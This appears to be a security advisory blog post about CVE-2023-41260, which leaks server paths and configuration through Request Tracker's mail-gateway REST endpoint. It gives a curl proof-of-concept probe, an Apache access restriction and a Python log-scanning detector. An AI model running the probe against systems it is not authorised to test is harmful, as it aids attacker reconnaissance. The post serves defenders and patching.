In August 2023, a critical security flaw was discovered and published as CVE-2023-41260 in the Best Practical Request Tracker (RT). This vulnerability affects most RT systems running versions before 4.4.7 and 5.0.5. If your organization uses RT to manage tickets, there is a high chance your helpdesk or support system is, or was, vulnerable to leaking sensitive system information via the mail-gateway REST API.
This article breaks down how CVE-2023-41260 works, what kind of data is exposed, and provides safe code samples and proof-of-concept exploit steps. For those running RT, patching is absolutely essential. Read until the end for practical detection and remediation tips.
What is Request Tracker’s Mail-Gateway REST API?
Request Tracker (RT) is an open-source support ticketing system. Part of its automation arsenal is the mail-gateway REST API, which receives emails and turns them into RT tickets.
This endpoint is supposed to be used only for legitimate email injection. However, due to insufficient controls, certain responses to API calls could accidentally disclose sensitive or internal information to unauthenticated users.
The Heart of CVE-2023-41260
Previous versions of RT lacked sufficient sanitization and privilege checks in REST/1.0/NoAuth/mail-gateway. When an unauthenticated user sent a malformed request to this API endpoint, the server’s response sometimes included:
- Configuration snippets and environmental info
This unintended information disclosure helps attackers map your system for further exploitation or social engineering.
An Example Exploit in Action
Let’s imagine you have RT set up at: https://rt.example.com/.
With curl, you can submit an incomplete or malformed POST request:
curl -i -k -X POST https://rt.example.com/REST/1.0/NoAuth/mail-gateway \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "some_bad_param=bad_value"
If still vulnerable, the response may look like:
HTTP/1.1 500 Internal Server Error
Content-Type: text/plain; charset=utf-8
An internal RT error has occurred. The RT team has been notified.
...
Stack Trace:
Trace begun at /opt/rt5/sbin/../lib/RT/Interface/Email.pm line 300
...
RT::Config::Get
RT_SiteConfig.pm line 42
...
Notice:
- Server file paths: /opt/rt5/...
- Environment details: Perl module lines, config info
All this is gold for an attacker preparing targeted attacks.
References
- Best Practical Advisory
- NIST CVE Entry
- RT Release Notes
- Metasploit module discussion
Upgrade RT ASAP to 4.4.7 or 5.0.5 (or later).
- See official patch notes.
If immediate patching isn’t possible,
- Limit public internet access to /REST/1.0/NoAuth/mail-gateway using web server rules.
Apache example to restrict the endpoint:
<Location "/REST/1.0/NoAuth/mail-gateway">
Require ip 192.168.1.0/24
</Location>
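As an added, defender-side example (not part of the original article and not RT's own code), the script below scans Apache combined-format access logs for requests to the mail-gateway endpoint and flags two things: any hit from outside the trusted mail-relay network, and 5xx responses from the endpoint, which is where a leaked trace would have been returned. The allowed network (mirroring the Apache rule above), the sample log lines and the finding labels are constructed assumptions.

```python
import ipaddress
import re
from typing import Optional

# RT's unauthenticated mail-gateway endpoint, as named in the advisory discussed above.
GATEWAY_PATH = "/REST/1.0/NoAuth/mail-gateway"

# Hosts that legitimately deliver mail into RT (assumed; same range as the Apache rule).
ALLOWED_NETS = [ipaddress.ip_network("192.168.1.0/24")]

# Apache "combined" format: client ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry

def classify(entry: dict) -> Optional[str]:
    """Return a finding label for a parsed entry, or None if it is unremarkable."""
    if entry["path"].split("?", 1)[0] != GATEWAY_PATH:
        return None
    try:
        src = ipaddress.ip_address(entry["ip"])
        from_allowed = any(src in net for net in ALLOWED_NETS)
    except ValueError:           # hostname or garbage in the client field: treat as untrusted
        from_allowed = False
    if not from_allowed and entry["status"] >= 500:
        return "external-5xx-possible-disclosure"   # untrusted client got an error page back
    if not from_allowed:
        return "gateway-hit-from-outside-allowlist"  # endpoint reachable from outside at all
    if entry["status"] >= 500:
        return "internal-5xx-check-config"           # trusted relay, but RT threw an error
    return None

def scan(lines) -> list:
    """Return (client_ip, timestamp, label) for every suspicious line in the log."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is not None and (label := classify(entry)):
            findings.append((entry["ip"], entry["ts"], label))
    return findings

# Constructed sample log lines (RFC 5737 documentation addresses; not a real capture).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Nov/2023:10:00:01 +0000] "POST /REST/1.0/NoAuth/mail-gateway HTTP/1.1" 500 812 "-" "curl/8.0.1"
192.168.1.20 - - [13/Nov/2023:10:00:05 +0000] "POST /REST/1.0/NoAuth/mail-gateway HTTP/1.1" 200 57 "-" "rt-mailgate/5.0"
203.0.113.7 - - [13/Nov/2023:10:00:09 +0000] "GET /Ticket/Display.html?id=1 HTTP/1.1" 302 0 "-" "curl/8.0.1"
198.51.100.4 - - [13/Nov/2023:10:00:12 +0000] "POST /REST/1.0/NoAuth/mail-gateway HTTP/1.1" 200 57 "-" "rt-mailgate/4.4"
"""

if __name__ == "__main__":
    for ip, ts, label in scan(SAMPLE_LOG.splitlines()):
        print(f"{ts} {ip} {label}")
```

Point `scan()` at your real access log (one line per element) to get a list of gateway hits worth reviewing; the 5xx-from-outside label is the one that corresponds to the disclosure path described in this article.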
Conclusion
CVE-2023-41260 is a classic reminder that error handling and API privilege checks are as critical as authentication itself. If your RT helpdesk is exposed online and hasn't seen a recent update, you might be giving away the blueprints of your setup to anyone who asks the right (malformed) way.
Patch now—or risk making the next attack on your infrastructure an inside job.
*Want to dig deeper? Get the full details on the Best Practical Advisory page.* If you found this helpful, share the warning with your sysadmin friends!
Timeline
Published on: 11/03/2023 05:15:29 UTC
Last modified on: 11/13/2023 17:17:24 UTC